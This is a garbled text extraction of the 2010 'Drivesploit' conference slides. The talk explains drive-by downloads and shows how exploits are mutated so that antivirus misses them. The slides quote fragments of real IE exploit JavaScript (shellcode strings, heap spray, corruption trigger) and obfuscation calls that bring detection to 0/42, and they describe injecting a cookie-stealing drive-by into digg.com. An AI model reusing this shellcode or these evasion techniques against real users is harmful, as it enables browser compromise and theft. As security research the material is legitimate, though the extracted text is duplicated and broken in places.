drivesploit: circumventing both automated and manual drive-by-download detection
DESCRIPTION
Given at black hat and DEF CON 2010 by Wayne Huang and team. https://www.defcon.org/html/defcon-18/dc-18-speakers.html#Huang http://www.blackhat.com/html/bh-us-10/bh-us-10-briefings.html#Huang DRIVESPLOIT: CIRCUMVENTING BOTH AUTOMATED AND MANUAL DRIVE-BY-DOWNLOAD DETECTION This year saw the biggest news in Web security ever--Operation Aurora, which aimed at stealing source code and other intellectual properties and succeeded with more than 30 companies, including Google. Incidence response showed that the operation involved an IE 0-day drive-by-download, resulting in Google's compromise and leak of source code to jump points in Taiwan. The US Government is so concerned that they issued a demarche to the Chinese government. Using real, live examples, we will show how easy it is to exploit injection-based, XSS-based, and CSRF-based vulnerabilities in FaceBook, Google, Digg, LinkedIn, and other popular websites, and inject drive-by downloads. If drive-bys are so easy to inject into high-traffic websites, then the question becomes, how easy it is to make them undetectable by automated malware scanning services (such as Google's) and by human manual inspection? We will demonstrate how easy it is to defeat automated detection mechanisms and overview commonly used techniques. We will reveal for the first time, in this conference, some very advanced techniques that are almost impossible to overcome by automated analysis in the past, now, and in the future. We will release Drivesploit, a drive-by download exploit framework implemented on top of Metasploit. We will go into depth on two particular techniques supported by Drivesploit's a) javascript obfuscation based on behavior-based fingerprinting, and b) javascript timelock puzzles. We will have live demos to show how this technique easily defeats both automated AND manual detection. At the very beginning of our talk, we will be giving out a digg.com page, which we have infected with a drive-by download created with Drivesploit. Visiting this page with the right browser will trigger the exploit and download a malware that steals browser cookie files. The whole process will be undetectable by antivirus. The actual javascript drive-by code contains a secret phrase. We will give out an ipad to whomever from the audience that is able to correctly deobfuscate the javascript and give out the secret phrase. Finally, we will present case studies on systems and processes that the largest organizations have put in place in order to fight against Web-based malware. We will also present case studies of our incidence response efforts with organizations hit by Web malware injections such as Google's aurora incident. Based in Taiwan, Co-speaker Wayne has been personally involved in such incidence response efforts since the late 90's. All source codes related to POC exploits against FaceBook, Google, Digg, LinkedIn, etc, as well as source code of Drivesploit, will be released as open source at the conference. Attendees will gain the following: 1. Understanding of drive-by downloads and associated terminologies. 2. Information about various drive-by download infection vectors. 3. Appreciation of tools helpful for drive-by analysis, including Malzilla, spikermonkey, rhino, burp and wepawet 4. Realize why drive-by downloads are hard to analyze and detect. Why antivirus fail, why behavior-based approaches fail, and why even manual efforts are difficult 5. Learning the Drivesploit framework and how it can be used to develop poc drive-bys 6. Learning two new deadly techniques: behavior-based browser finterprinting and javascript timelock puzzles 7. Learning how to implement above two using Drivesploit to defeat both automated and manual drive-by analysis 8. Knowledge about the available countermeasures to this threatTRANSCRIPT
掛馬免殺掛馬免殺DRIVESPLOITDRIVESPLOITCIRCUMVENTINGAUTOMATED ANDAUTOMATED ANDMANUAL DETECTIONOF BROWSER EXPLOITSOF BROWSER EXPLOITS
Wayne Huang, Cofounder & CTOFyodor YarochkinAntonio Rohman FernandezAntonio Rohman FernandezChris HsiaoArmorize Technologies, Inc.@waynehuang
One type of browser exploit:One type of browser exploit:
Drive-by Downloads defined
2
Drive-by-Download Explained
• Hackers distribute malware by Hackers distribute malware by "poisoning" legitimate websites
• Typical: injects malicious iframesTypical: injects malicious iframesinto HTML content
3
Drive-by-Download Explained
• Affected websites:– Essentially becomes a delivery mechanism for
malware– Appear normal
• Victims– Do not need to "click" or "agree to" anything– Simply connecting to the website executes the
attack
4
Drive-by Download Incidents
• Aurora (Google)Aurora (Google)– June 2009-Feb 2010T t d tt k–Targeted attack
– IE 0day CVE-2010-0249–Confirmed publicly by Google, Adobe Systems, Juniper Networks
d R kSand RackSpace–Total of 34 organization targetedg g
Drive-by Download Incidents
• DNF666 Mass SQL InjectionDNF666 Mass SQL Injection–Since March, 2010J Ad b 0d CVE 2010 1297– Jun: Adobe 0day CVE-2010-1297
–Victims: Wall Street Journal, J l P t tJarusalem Post, etc
–dnf666.net, robint.us, 2677.in, 4589 i 22d f4589.in, 22dnf.com
CNN
GameSpot
US Treasury
http://thompson.blog.avg.com/2010/05/treasury‐website‐hacked.html
PlayStation.com
Washington Post
Dissecting Drive-By Downloads
Page + Browser
Exploit ServerPage + Browser
ExploitPayload =
d l ddownloader
12
Dissecting Drive-By Downloads
Page + Browser
Exploit ServerPage + Browser
ExploitPayload =
d l d<script>var sc = unescape("%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
downloader
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } varcc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <
13
200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = " \
Dissecting Drive-By Downloads
Page + BrowserExploit!
Exploit ServerPage + Browser
ExploitPayload =
d l d<script>var sc = unescape("%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
downloader
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } varcc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <
14
200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = " \
Dissecting Drive-By Downloads
Exploit!Exploits / droppers
Exploit ServerDropper executesExploits / droppers
15
Dissecting Drive-By Downloads
Exploits / droppersExploits / droppers
Exploit ServerMalware
Malware Server
16
Dissecting Drive-By Downloads
Exploits / droppersExploits / droppers
Exploit ServerMalware
Malware Server
17Controller
Dissecting Drive-By Downloads
But who would visit?But who would visit?The key now is TRAFFIC
Exploits / droppersExploits / droppers
Exploit ServerMalware
Malware Server
18Controller
(1) Legitimate, injectable sites
URL Generators Landing Site
Exploits / droppers
Landing Site
Exploits / droppers
Exploit ServerMalware
Malware Server
19Controller
(1) Legitimate, injectable sites
URL Generators Landing Site
Exploits / droppers
Landing Site
May-Ongoing: DNF666 mass SQL Exploits / droppers
Exploit Serveray O go g 666 ass SQ
injections
Malware May-June: Shared hosting compromise, GoDaddy RackSpace Network
Malware ServerGoDaddy, RackSpace, Network Solutions, BlueHost, DreamHost
20 Continuous targeted attacks
(1) Legitimate, vulnerable sites
URL Generators Landing Site
Exploits / droppers
Landing Site
Mass SQL injectionsExploits / droppers
Exploit Server Mass hosting compromises
Malware Directly inside HTML / PHP / ASP
Hidden inside WorldPress files
Malware Server Hidden inside DB
21 Hidden inside DB stored procedures
(2) Man-in-the-MiddleLANWAN
URL Generators Landing Site
Exploits / droppers
Landing Site
No tampering of websiteExploits / droppers
Exploit Server
p g
LAN: ARP spoofing via ZXARPS and other
Malwaretools
WAN: March 2009 middle of route Malware Server
WAN: March 2009, middle of route, tw.msn.com, taiwan.cnet.com, others
22
Cisco advisory: http://tools.cisco.com/security/center/viewAlert.x?alertId=17778
LIVE LIVE DEMO 1DEMO 1LIVE LIVE DEMO 1DEMO 1
http://digg.com/software/http://digg.com/software/http://digg.com/software/http://digg.com/software/Internet_Storm_CenterInternet_Storm_Center__
23
_ __ _ __Diary_2010_02_27Diary_2010_02_27
Live demo recap
Live demo recap
Injected javascript in digg.com
Live demo recap
1. Inject javascript into digg.comj j p gg2. Javascript loads iframe from our domain
zcrack.orgzcrack.org3. Metasploit (drivesploit) is running on
zcrack org serves ie peers exploitzcrack.org, serves ie peers exploit4. Bypasses AV5. IE visitor attacked, IE crashes,
meterpreter starts, jumps process to notepad exenotepad.exe
6. We have a shell :)
MOTIVATIONMOTIVATION
We provide solutions that monitors pwebsites and detect malicious
t t 24 7contents 24x7
We use multiple behavior-, heuristic-, p , ,and signature-based technologies
27
MOTIVATION
Most technologies are developed on Most technologies are developed on our own, BUT,
We also integrate anti-virus, whose
$expensive$licenses are $expensive$28
MOTIVATION
We spend a lot of time testing our own We spend a lot of time testing our own technologies, and selecting anti-virus
t h l gitechnologies
The key is: how good are we (and them) at
NEWdetecting NEW drive-by downloads
29
MOTIVATIONMOTIVATION
We need a good framework to help us g preplicate, manipulate, and mutate
exploits found in the wildexploits found in the wild
--into NEW derivatives
30
DRIVESPLOITDRIVESPLOITIS BORNIS BORN
ON TOP OF ON TOP OF METASPLOITMETASPLOIT
31
INITIAL FINDINGS
ANTIVIRUS CAPABILITIESDIFFER GREATLY!DIFFER GREATLY!
DESKTOP AND API VERSIONSDIFFER GREATLY IN PERFORMANCE
COST != PERFORMANCE
Antivirus vs. Drive-bys
URL Generators Landing Site
Exploits / droppers
Landing Site
Exploits / droppers
Exploit ServerMalware
Malware Server
33Controller
Antivirus vs. Drive-bys
URL Generators Landing SiteJAVASCRIPT
Exploits / droppers
Landing SiteJAVASCRIPT
Exploits / droppers
Exploit ServerJAVASCRIPTMalware
PE BINARYMalware Server
PE BINARY
34Controller
Antivirus vs. Drive-bys
URL Generators Landing SiteJAVASCRIPT
Exploits / droppers
Landing SiteJAVASCRIPT
Exploits / droppers
Exploit ServerJAVASCRIPTMalware
PE BINARYMalware Server
PE BINARY
We will detect35Controller
We will detect this part!!
Why we can’t rely on PE detection
• Exploit server domains are often taken down after a few days, but the injected URL generators and the exploit servers live on– Attack reported to the hosting / registrar
– Domain banned by ISPs
Purchased duration was over– Purchased duration was over
• We want to detect the injection so our customers We want to detect the injection so our customers can remove it
• Actually statically detecting javascript exploits is • Actually, statically detecting javascript exploits is quite difficult
36
THE TAO:THE TAO:ECMA SCRIPTSECMA-SCRIPTS
JAVASCRIPTJAVASCRIPTVBSCRIPTVBSCRIPTADOBE JS
ACTIONSCRIPT37
JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators Landing Site
Exploits / droppers
Landing Site
Exploits / droppers
Exploit ServerMalware
Malware Server
38Controller
JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators Landing Site
Exploits / droppers
Landing Site
Exploits / droppers
Exploit ServerMalware
39Controller
JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators Landing Site
Exploits / droppers
Landing Site
Exploits / droppers
Exploit Server
40Controller
JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators Landing Site
Exploits / droppers
Landing Site
Exploits / droppers
Exploit Server(METASPLOT)(METASPLOT)
41Controller
JAVASCRIPT!! (ECMA-SCRIPT)
URL Generators Landing Site
Exploits / droppers
Landing Site
Exploits / droppers
Exploit Server(METASPLOT)
PAYLOAD(METASPLOT)meterpreter
(memory(memoryinjection)
42Controller
Drive-By wants to…
• Avoid detection at the victim's desktop
• Avoid detection by UTM/gatewaysAvoid detection by UTM/gateways• Avoid detection
b t t dby automatedmonitors
• Live for as long iblas possible
Drive-By wants to…
CONCLUSION: CONCLUSION: Reduce exposure:Serve SELECTIVELY
Avoid detection and analysis:Avoid detection and analysis:Mutate well
Serve Selectively
HTTP LEVEL:Serve only to:• Fresh IPs (serve once per IP)• Fresh IPs (serve once per IP)
set HTTP::client::onlyonce true
• Particular referer (eg Gumblar)• Particular referer (eg. Gumblar)set HTTP::referer google.com
• Particular agent string (vulnerable browser)Particular agent string (vulnerable browser)set HTTP::agent::MSIE 7.0
• Black listBlack listset HTTP::client::blacklist false
SCRIPT MUTATIONSCRIPT MUTATION
For exploitFor exploitF l dFor payload
46
The goal is not to "obfuscate"...
JAVASCRIPT EXPLOIT DISEC
ShellcodeShellcode
M Corrupt
Heapspray
Triggergg
JAVASCRIPT EXPLOIT DISEC
Shellcode <script>var shellraw = Shellcode "%u7679%u4673%u757b%u924e%u66b9%ub441%u018d%u7df9%u241c%ud631%u40b7%ueb11%u043d%u
M Corrupt be97%u212c%u05e1%u8335%u42fc%ub893%u227f%u98d4%u484b%u8c90%u13e0%uf8d3%u7aba%u7278
Heapspray%u2034%u49f5%u259f%u9137%u339b%u1dd5%ub1b0%u3f99%u2f43%u3cb6%ub2a8%ub30c%u4714%u3d7b% 138% f803% 66b2% 97b9d7b%ue138%uf803%u66b2%u97b9%u9335%u767a%ub805%ue201%u4a2f%u85a8%u7eeb%uf93b%u414f%u257d%u78bf%u2c43%u7f99%ubb2Trigger u257d%u78bf%u2c43%u7f99%ubb2d%ub098%ub342%u918d%u3fb2%u704a%u7147%u7f74%u3073%u77f9%ubb40
gg
%ubb40
JAVASCRIPT EXPLOIT DISEC
var j_object = Shellcode document.createElement('body');
j_object.addBehavior('#default#user
Shellcode
M Corrupt Data');
document.appendChild(j_object);
Heapspray try {for (counter=0; counter<10;
t ) {counter++) {j_object.setAttribute('s',window);}} catch(e){ }window status+ '';}Trigger catch(e){ }window.status+= ;}gg
JAVASCRIPT EXPLOIT DISEC
Shellcode var counter;var shellcode = Shellcode unescape(shellraw);var memory = new Array();var
Buffer Ovf slackspace = 0x86000‐(shellcode.length*2);var nops =
Heapsprayunescape("%u0c0c%u0c0c");
while(nops.length<slackspace/2) { } fillbl knops+=nops; }var fillblock =
nops.substring(0,slackspace/2);delete nops;Triggerfor(counter=0; counter<270; counter++) {memory[counter] = fillblock + fillblock + shellcode;
gg
fillblock + fillblock + shellcode;
JAVASCRIPT EXPLOIT DISEC
Shellcode <button id='j id'Shellcode <button id j_id onclick='bootstrapper();' style='display:none'></butt
M Corrupt on>
………
Heapspray…
document.getElementById(Trigger'j_id').onclick();
gg
JAVASCRIPT EXPLOIT DISEC
ShellcodeShellcodeOBFUSCATED
M Corrupt BLOB
Heapspray
TriggerDE‐
OBFUSCATORgg OBFUSCATORPrimitiveF
ObfuscatedFForm Form
Dissecting Drive-By Downloads
Page + BrowserExploit!
Exploit ServerPage + Browser
ExploitPayload =
d l d<script>var sc = unescape("%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
downloader
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr[i] = String.fromCharCode(sss[i]/7); } varcc=arr.toString();cc=cc.replace(/ ,/ g, "" ); cc = cc.replace(/@/g, ","); eval(cc); var x1 = new Array(); for (i = 0; i <
54
200; i ++ ){ x1[i] = document.createElement("COMMENT"); x1[i].data = "abc"; } ; var e1 = null; function ev1(evt){ e1 = document.createEventObject(evt); document.getElementById("sp1").innerHTML = ""; window.setInterval(ev2, 50); } function ev2(){ p = " \
JAVASCRIPT EXPLOIT DISEC
ShellcodeShellcodeOBFUSCATED
M Corrupt BLOB
Heapspray
TriggerDE‐
OBFUSCATORStart gg OBFUSCATORPrimitiveF
ObfuscatedFForm Form
JAVASCRIPT EXPLOIT DISEC
ShellcodeShellcodeOBFUSCATED
M Corrupt BLOB Mutate
HeapsprayMutate
TriggerDE‐
OBFUSCATORStart gg OBFUSCATORPrimitiveF
ObfuscatedFForm Form
JAVASCRIPT EXPLOIT DISEC
ShellcodeShellcodeOBFUSCATED
M Corrupt BLOB Mutate
HeapsprayMutate
TriggerDE‐
OBFUSCATORStart gg OBFUSCATORPrimitiveF
ObfuscatedFPreventForm FormPrevent
MUTATION FEATURESIMPLEMENTEDSO FARSO FAR
1. Javascript Random Variable Auto ReplacementReplacement• Accepts a piece of javascriptp p j p• Parses the javascript according to
grammergrammer• Auto replaces all variable names and
function names with random namesfunction names with random names• Passes back:
a) the new javascriptb) a vector of old-new name mappings) pp g
1. Javascript Random Variable Auto Replacementrandomized =
Replacement
Rex::Exploitation::DriveSploit::obfuscatejs(js, j (j ,Rex::Exploitation::DriveSploit::AUTO_RANDOM_VARS)
2. Javascript Concat String Obf tiObfuscation
arr = Rex::Exploitation::DriveSploit.obfuscat j ( h ll dtejs(shellcode, Rex::Exploitation::DriveSploit::STRINGCONCAT)CONCAT)
h ll d i t [0]shellcode script = arr[0]shellcode_var = arr[1]
2. Javascript Concat String Obf ti
% 7679% 4673% 757% 924
Obfuscation
%u7679%u4673%u757%u924e
A1 = "%u7";A2 = "679%";
A3 = "u4673%";A4 = "u75";A2 = 679% ;
A3 = "u4673%";A4 = "u75";
A4 = u75 ;A1 = "%u7";A5 = "7%u92";A4 = u75 ;
A5 = "7%u92";A6 "4e";
A5 = 7%u92 ;A2 = "679%";A6 "4e";A6 = "4e"; A6 = "4e";
2. Javascript Concat String Obf ti
% 7679% 4673% 757% 924
Obfuscation
%u7679%u4673%u757%u924e
A3 = "u4673%";A4 = "u75";
B1 = A1+A2;B2 = A3+A4; Layer 2
A4 = u75 ;A1 = "%u7";A5 = "7%u92";;
B3 = A5+A6;ay A5 = 7%u92 ;
A2 = "679%";A6 "4e";A6 = "4e";
2. Javascript Concat String Obf ti
% 7679% 4673% 757% 924
Obfuscation
%u7679%u4673%u757%u924e
B1 = A1+A2;B2 = A3+A4;
B2 = A1+A2;B3 = A5+A6;;
B3 = A5+A6;;
B1 = A3+A4;
2. Javascript Concat String Obf ti
% 7679% 4673% 757% 924
Obfuscation
A3 " 4673%” A4 " 75”
%u7679%u4673%u757%u924e
A3 = "u4673%”;A4 = "u75”;A1 = "%u7";A5 = "7%u92”;A2 = "679%";A6 = "4e"; B2 = A1+A2;A6 = 4e ; B2 = A1+A2;B1 = A3+A4;B3 = A5+A6;C1=B1+B2;D1=C1+B3;// variable names are randomized// variable names are randomized
3. Javascript Random Text Insertion
insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10)
shellcode = insertret[0]random insertion string = insertret[1]
3. Javascript Random Text Insertion
insertret = Rex::Exploitation::DriveSploit.getInsertion(shellcode, 4, 6, 10) # insert a fixed 6-character random# string, for every 4-8 characters
returnsa) a piece of javascript containing the
injected stringb) Javascript variable name containing
the reverted, original string
4. Numeric Literal Mutation
slackspace = pRex::Exploitation::Drivesploit obfuscateNumber(0x86000oit.obfuscateNumber(0x86000)
4. Numeric Literal Mutation
slackspace = pRex::Exploitation::Drivesploit obfuscateNumber(0x86000oit.obfuscateNumber(0x86000)
(246*2)+(5676*96)+(34*4)+8+(3332*1)( 6 ) (56 6 96) (3 ) 8 (333 )
4. Numeric Literal Mutationslackspace = 0x86000l kslackspace = (246*2)+(5676*96)+(34*4)+8+(3332*1)
Trigger Prevention
ShellcodeShellcodeOBFUSCATED
M Corrupt BLOB
Heapspray
TriggerDE‐
OBFUSCATORStart gg OBFUSCATORPrimitiveF
ObfuscatedFPreventForm FormPrevent
Trigger prevention
• <div onload• <img onload• var a=1; var b=0;• var a=1; var b=0;
do {useless code;
} while (a==b);} while (a b);• Fingerprinting-based encryption
TESTING IT OUTUsing the IE peers exploit as exampleCVE‐2010‐0806(MS10‐018)
PLAIN: 17/42
RANDOM VARS: 16/42 (某採!)
INJECT SC: 13/42
RANDVAR+CONCAT SC+INJECT SC 11/4211/42
ROUGHLY 6/17ANTI VIRUSANTI-VIRUSDETECTS BASED ONDETECTS BASED ONSHELLCODE(FOR THIS EXPLOIT)(FOR THIS EXPLOIT)
CONCAT SC+CODE: 1/42
INJECT SC+CONCAT CODE: 0/42
RANDVAR+INJECT SC+CONCAT CODE: 0/42CODE: 0/42
ANTIVIRUSDESKTOP VERSIONIS MUCH STRONGERIS MUCH STRONGER
ANTIVIRUS DESKTOP VERSION
• Can monitor host environmentCan monitor host environment– Hook into browsers– Easier to get raw form of– Easier to get raw form of
exploit
• Behavior analysisBehavior analysis– Buffer overflow behavior
Download to file behavior– Download-to-file behavior
AntiVirus Desktop Kung FuTo Ag Sc Aa Ky
Plain ✖ ✖ ✔ ✔ ✔
Random variables ✖ ✖ ✔ ✔ ✔
Split literals ✖ ✖ ✔ ✔ ✔
Injection SC ✖ ✖ ✔ ✔ ✔Injection SC ✖ ✖ ✔ ✔ ✔
Concat SC ✖ ✖ ✔ ✔ ✔
Concat CODE ✖ ✔ ✖ ✔ ✔
Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔
Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔
AntiVirus Desktop Kung FuTo Ag Sc Aa Ky M
Plain ✖ ✖ ✔ ✔ ✔ ✔✔
Random variables ✖ ✖ ✔ ✔ ✔ ✔✔
Split literals ✖ ✖ ✔ ✔ ✔ ✔✔
Injection SC ✖ ✖ ✔ ✔ ✔ ✖✔Injection SC ✖ ✖ ✔ ✔ ✔ ✖✔
Concat SC ✖ ✖ ✔ ✔ ✔ ✖✔
Concat CODE ✖ ✔ ✖ ✔ ✔ ✖✔
Concat SC + Concat CODE ✖ ✖ ✖ ✔ ✔ ✖✔
Inject SC + Concat CODE ✖ ✖ ✖ ✖ ✔ ✖✔
LIVE DEMO 2LIVE DEMO 2DESKTOPANTIVIRUSBYPASSBYPASS
5. FINGERPRINTING-BASED ENCRYPTION
Wepawet doesn’t tell much
88
89
90
91
92
Browser Feature TableIE7 FF Safari Opera Chrome
Is contextmenu event supported True True True False TrueIs_contextmenu_event_supported True True True False True
String_prototype_replace_ignore_functions False False True (2.0.2) False False
Is_ES5_strict_mode_supported False False False False False
Array prototype slice can convert to array False True True True TrueArray_prototype_slice_can_convert_to_array False True True True True
Getelementsbytagname_returns_comment_nodes True False False False False
Is_element_tagname_uppercased True True True True True
Is_canvas_element_supported False True True True True
Is_DOMFocusIn_supported False False True True True
Is_CSS_boder_radius_supported False True True False True
Function_identified_leaks_onto_enclosing_scope True False False False False
Script_element_rejects_textnode_appending True False False False False
Is_contextmenu_event_supported True True True False True
Is_position_fixed_supported False True True False True
Computed_style_return_static_positioned_element False False False True False
93
5. Fingerprinting-Based Encryption Summary• "This exploit works only for IE6"• This exploit works only for IE6• "Give me an encrypted version of my
j i t l it”javascript exploit”• "Give me javascript to generate the
decoding key"• "The key is only correctly generated if the y y y g
javascript is run under IE6"
94
5. Fingerprinting-Based Encryption Summary
A=Check1();
B=Check3();B=Check3();
C=Check4();
D=Check6();D Check6();
E=Check8();
F=Check9();();
G=Check12();
H=Check14();
95
5. Fingerprinting-Based Encryption Summary
A=Check1();
B=Check3();
A=Check6();
B=Check12();B=Check3();
C=Check4();
D=Check6();
B=Check12();
C=Check8();
D=Check1();D Check6();
E=Check8();
F=Check9();
D Check1();
E=Check4();
F=Check14();();
G=Check12();
H=Check14();
();
G=Check3();
H=Check9();
96
5. Fingerprinting-Based Encryption Summary
A=Check1();
B=Check3();
A=Check6();
B=Check12();One‐time key
B=Check3();
C=Check4();
D=Check6();
B=Check12();
C=Check8();
D=Check1();D Check6();
E=Check8();
F=Check9();
D Check1();
E=Check4();
F=Check14();
Encryptjavascript
l();
G=Check12();
H=Check14();
();
G=Check3();
H=Check9();
exploit
Generatedecoding
97
decodingjavascript
Why not Anti-Virus?
• AV is to install on desktops / notebooksp• Complicated normal behaviors• Strict resource constraints• Strict resource constraints• Therefore, AV and gateway vendors rely
on:– Signature-based pattern matching technologies
LIGHTWEIGHT and ACCURATE– LIGHTWEIGHT and ACCURATE
• Why can’t such technology used to detect drive-by-downloads?drive-by-downloads?
98
Javascripts are not harmfult th i tto the environment…
99
… so they are usually not reused
AV no good because drive-by-downloads are in:g y• Disposable Javascript• Disposable PDF Adobe JS• Disposable PDF Adobe JS• Disposable Flash actionscript• All ECMA-
scriptsscripts
100you don't usually reuse them…
Javascript Packing Is a NormJavascript Packing Is a Norm• Packing is widely used by legitimate code!
– To protect javascript source codeTo protect javascript source code– To reduce javascript size
• Google Closure Compilerhttp //code google com/clos e/compile /– http://code.google.com/closure/compiler/
• Yahoo Javascript Packer (YUI Compressor)– http://developer.yahoo.com/yui/compressor/ p // p y /y / p /
• Advanced HTML Protector– http://www.creabit.com/htmlprotect/D Ed d ’ P k• Dean Edwards’ Packer– http://dean.edwards.name/packer/
• Online JS ObfuscatorOnline JS Obfuscator– http://www.iwebtool.com/html_encrypter
• http://www.cha88.cn/safe/fromCharCode.php
101
OK so AV doesn’t work (that well)… OK so AV doesn t work (that well)…How about behavior-based approaches?
102
Defeating Behavior Analysis
1. Use VBScript– Exploits in VBScript– URL generators in VBScript
Exploits in / generated by VBScript– Exploits in / generated by VBScript– May defeat SpiderMonkey et al (Rhino,
JSunPack, etc)
2. Don’t serve to detectors– You can’t detect what you don’t have– Serve to each IP only once
Detect agent strings– Detect agent strings– Collect robot IPs—Google, Yahoo, security
vendors
103
Defeating Behavior Analysis
3. Fingerprint-based encryptiong p yp
l b ff h3. Little but effective techniques– Sleep(30000); //using SetTimeout– Timelock puzzles
104
Future Work
• Randomly chop up scripts and split into d d l f lindividual files
• Generating VBscript instead of javascriptg p j p• Encrypting
using datausing dataexistingoutside ofHTML– HTTP headers
Discussion
• The Panopticlick experiment by p p yEckersley of EFF– 94.2% of "typical desktop browsers” are uniqueyp p q
• Can fingerprinting-based encryption be integrated with this type of be integrated with this type of individual fingerprinting, to prevent detection and analysis of target detection and analysis of target attacks?
THANK YOU!THANK [email protected]
@waynehuang
@drivesploit
http://www drivesploit orghttp://www.drivesploit.org
Credits: wayne huang, fyodor yarochkin, g
antonio rohman fernandez
Special thanks to: Benson Wu, Jeremy Chiu,
Kuon Ding Felix ColaKuon Ding, Felix, Cola
References• James Lee, Using guided missles in drive-bys
http://www slideshare net/egypt/using-guided-missiles-in-http://www.slideshare.net/egypt/using guided missiles indrivebys-automatic-browser-fingerprinting-and-exploitation-with-the-metasploit-frameworks-browser-autopwn
• Sebastian Porst, How to really obfuscate your , y yPDF malware http://www.slideshare.net/cblichmann/how-to-really-obfuscate-your-pdf-malware
• Jeremy Chiu, 0box analyzer: afterdarkJeremy Chiu, 0box analyzer: afterdarkruntime forensics for automated malware analysis and clustering http://www.slideshare.net/wayne_armorize/0-box-analyzer-ft d k ti f i f t t d l l i dafterdark-runtime-forensics-for-automated-malware-analysis-and-
clustering-2
• HeapLib support added to Metasploit 3 http://blog metasploit com/2007/04/heaplib support added tohttp://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html